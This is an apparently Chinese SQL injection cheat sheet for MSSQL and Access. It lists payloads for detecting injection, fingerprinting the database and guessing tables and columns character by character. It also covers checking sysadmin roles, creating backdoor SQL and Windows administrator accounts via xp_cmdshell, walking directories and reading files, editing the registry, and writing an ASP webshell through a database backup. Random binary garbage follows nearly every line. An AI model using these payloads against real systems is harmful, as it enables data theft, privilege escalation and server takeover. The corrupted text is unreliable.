1.判断是否有注入;and 1=1 ;and 1=2 #SHmA���B�
2.初步判断是否是mssql ;and user>0 _86�#$|k�w
ii.�L]#3y�
3.注入参数是字符'and [查询条件] and ''=' a�cSm+t���
_?vh#���6F
4.搜索时没过滤参数的'and [查询条件] and '%25'=' "!9h�cv-�;
Gj~�1eS��
5.判断数据库系统 8>E�_bx�C�
Z$0+j�pG_s
;and (select count(*) from sysobjects)>0 mssql woH�B![Q,�
,_JhvPWR,)
;and (select count(*) from msysobjects)>0 access uN:|�4/;{&
"5KJ /7q!
>y2;sJ4]D%
wH�=L+bA>a
6.猜数据库 ;and (select Count(*) from [数据库名])>0 CO�E,pb1�7
+s*OZ6i� [
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 %TY;}V59�b
�f�Q\nK H~
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 fkp�rT�k^#
p)t1]�<,Of
9.(1)猜字段的ascii值(access) _h%
:T��u�
$���=�x�1_
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 0Cox�+QJ�t
�K+0&�~X�U
(2)猜字段的ascii值(mssql) _f~(g1sE��
�j.3#�rxq�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �; bB�z<��
5����/v,|�
10.测试权限结构(mssql) y^r�cUPLT�
Y���F�+hN\
~*3obZ2>2�
3'd(=hJ45$
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- J��3]!�<v=
pJ` ��M5pF
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ]x8_f6�;D�
h,�Y!d]2�w
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ��Quc,,#�u
yGNZ�w7^(�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- u�Cc.dluU
;X�JK�*QDN
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- _�xg4;W6M=
�3Y\7+975m
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �-m�S�i�Z�
�_�%Hp��B=
;and 1=(select IS_MEMBER('db_owner'));-- 8�1����\$X
��J{GtH�[�
�L{��v^:��
x.V6�C0|6"
11.添加mssql和系统的帐户 Cd�4a7�<-�
4�Xna��}�7
;exec master.dbo.sp_addlogin username;-- <��OKzb3e�
;exec master.dbo.sp_password null,username,password;-- x+�kP,v���
-ff|Xx�ar{
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �2<d�l��23
kI|Vv9�0�l
;exec master.dbo.xp_cmdshell 'net user username password FiTP-~
�
<O`yM2/pS�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- s\�c*ibxM,
<
q6z$c)K�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �
b>�N)��H
�|!r.p_Zt�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 2b+0}u�>�a
�/?POIn+0o
NF&
++Vr6�
��dcFqK��~
12.(1)遍历目录 V}1D�1�.�@
=�F!Dw�aZ
;create table dirs(paths varchar(100), id int) u3!aKXnv�<
^�y��.e
Fz
;insert dirs exec master.dbo.xp_dirtree 'c:\' S.;�>:Dd[K
9m2_zfO[�w
;and (select top 1 paths from dirs)>0 �8\-�Q(9q(
���I�Ar���
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) H��aP�0;9q
{HV$hU+_)Q
SZOcF�m�C?
P!?Je/�Tz]
(2)遍历目录 RB5fn+Fi�Z
�q!�i���Mc
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- L� �� �l�P
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Qm|��Q0u��
�'�4PAH2&n
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �nwwKef�(�
#+V����5�$
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �[OI&_W�Iw
7wt2�|$Q�z
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �%21i#R`E�
=-M)2&~L�~
nZF�(92��v
9N9�dQ}[:g
13.mssql中的存储过程 IL�t�95��l
1Aq*�|JSk(
xp_regenumvalues 注册表根键, 子键 ��qp(F�}�@
*}9�i@DP1,
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 q&�IO9/[dk
LEM{�$Fxo&
xp_regread 根键,子键,键值名 �K)2Z��H�@
:@PM+�[B|Q
;exec xp_regread ICNS�+KsI
@=����[/bG
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 G�t&x<����
o.tCw\M�$g
xp_regwrite 根键,子键, 值名, 值类型, 值 0B(<I�?a�/
t��uA���,t
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 *_<P�%��J�
1s���FTXl�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 WA-`
*�m$v
m`<Mzk�.u<
xp_regdeletevalue 根键,子键,值名 R�UTlwT�dv
���h�+m��M
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ��2[&3$-�]
�e^�g3J/aU
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Jtj_R��l
!
�W_E�M
�k�
�nZ>bOP+�,
(7�RxCo=�X
14.mssql的backup创建webshell i2{xW`AcUh
fP`g#t)4Tu
use model /^~3Ib8Fw+
�lAsDdxB�`
create table cmd(str image); +w ����O�a
,jWMJ0X/N=
insert into cmd(str) values (''); ���i/rdPbq
/#�Y)n�yE
backup database model to disk='c:\l.asp'; M.K-�)�r�,
73/kyu�-0%
Q�)���\7(n
EG5��'kYw2
15.mssql内置函数 $�'3`$�
��
+zxj-di�M�
;and (select @@version)>0 获得Windows的版本号 u,0�N[.�&N
�2��Mc/ah
;and user_name()='dbo' 判断当前系统的连接用户是不是sa Sf�>R7.lpP
?PNG@�OK�
;and (select user_name())>0 爆当前系统的连接用户 !Gu,�X'#Ab
��u��49zc9
;and (select db_name())>0 得到当前连接的数据库 t�E0DST/��
3��Oy�-\09
8tWOV�LquJ
�y�p=�Hx�f
16.简洁的webshell LTu�
c�s�}
(: IU��g
�
use model >_QC_UX>4i
q�u[�� ~#�
create table cmd(str image); Gx��?p,�Fj
�W
B)�<�B
insert into cmd(str) values (''); M:|Z�3�p K
��H8~<;6W�
backup database model to disk='g:\wwwtest\l.asp';
